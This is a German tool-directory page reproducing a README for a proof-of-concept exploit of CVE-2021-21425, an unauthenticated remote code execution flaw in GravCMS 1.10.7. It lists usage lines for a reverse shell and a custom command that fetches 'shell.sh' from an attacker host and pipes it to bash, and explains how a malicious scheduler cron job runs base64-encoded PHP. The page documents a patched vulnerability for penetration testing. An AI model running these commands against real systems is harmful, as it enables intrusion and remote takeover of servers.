Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-21425 — CVE-2021-21425 - GravCMS 1.10.7 Unauthenticated RCE via Scheduler. Verbesserter Exploit mit CLI-Argumenten und automatischer base64-Kodierung. | Kitploit
Tools/GitHubGitHub/d4ytox/cve-2021-21425
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubd4ytox/cve-2021-21425

CVE-2021-21425

CVE-2021-21425 - GravCMS 1.10.7 Unauthenticated RCE via Scheduler. Verbesserter Exploit mit CLI-Argumenten und automatischer base64-Kodierung.

Repository anzeigen
111vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-21425 - GravCMS Unauthenticated RCE

Verbesserter Proof-of-Concept für CVE-2021-21425, eine nicht authentifizierte Remote-Code-Execution-Schwachstelle in GravCMS <= 1.10.7 über beliebiges YAML-Schreiben in den Scheduler.

Danksagung

Dies ist abgeleitete Arbeit. Die Schwachstelle und der ursprüngliche Exploit stammen nicht von mir.

RolleWer
Schwachstelle entdeckt vonMehmet Ince (@mdisec), PRODAFT / INVICTUS Europe — März 2021
Ursprünglicher PoC von"legend" — Exploit-DB EDB-49973
Änderungen in diesem Repo vond4ytox

Was diese Version ändert

Der ursprüngliche EDB-49973 erfordert das manuelle Bearbeiten fest codierter Werte im Skript. Diese Version fügt hinzu:

  • Kommandozeilenargumente für Ziel, LHOST, LPORT
  • Automatische Base64-Kodierung der Reverse-Shell-Payload
  • Unterstützung für benutzerdefinierte Befehle (-c)
  • Fehlerbehandlung und Statusausgabe

Dies sind Benutzerfreundlichkeitsänderungen an einem bestehenden Exploit. Es wird keine Schwachstellenforschung beansprucht.

Schwachstelle

FeldWert
CVECVE-2021-21425
EDB-ID49973
BetroffenGravCMS <= 1.10.7
TypUnauthenticated RCE
CVSS9.8 (Critical)

Das Grav Admin Plugin überprüft die Authentifizierung bei bestimmten Admin-Routen nicht, wodurch nicht authentifizierte Benutzer beliebige YAML-Konfigurationen schreiben können. Dieser Exploit missbraucht die Scheduler-Konfiguration, um einen Cron-Job zu erstellen, der beliebigen PHP-Code ausführt.

Verwendung

# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>

# Custom command
python3 exploit.py -t http://target -c "id"

Beispiele

# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444

# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"

Anforderungen

pip install requests

Funktionsweise

  1. Ruft /admin ab, um das admin-nonce-Token zu extrahieren (aufgrund der Schwachstelle ist keine Authentifizierung erforderlich)
  2. Sendet POST an /admin/config/scheduler mit bösartiger Cron-Job-Konfiguration
  3. Der Scheduler führt die PHP-Payload über /usr/bin/php -r eval(base64_decode(...)) aus
  4. PHP schreibt die base64-dekodierte Reverse Shell nach /tmp/rev.sh und führt sie aus

Der Cron-Job läuft jede Minute (* * * * *), sodass die Shell innerhalb von 60 Sekunden eintrifft.

Zeitleiste

  • 2021-03-18 - Schwachstelle von Mehmet Ince während eines Penetrationstests gefunden
  • 2021-03-29 - Offengelegt
  • 2021-04-01 - Gepatcht in Grav Admin Plugin 1.10.8

Referenzen

  • NVD-Eintrag
  • GitHub Security Advisory GHSA-6f53-6qgv-39pj
  • Ursprünglicher Writeup von Mehmet Ince (Pentest Blog)
  • Ursprünglicher PoC - Exploit-DB EDB-49973

Lizenz

MIT, geltend nur für die Änderungen in diesem Repository. Der ursprüngliche PoC trägt keine Lizenz, daher bleiben alle Rechte beim Autor. Siehe LICENSE für den vollständigen Attributionshinweis.

Haftungsausschluss

Nur für autorisierte Sicherheitstests. Stellen Sie sicher, dass Sie eine schriftliche Genehmigung haben, bevor Sie gegen ein System testen.

Tool herunterladen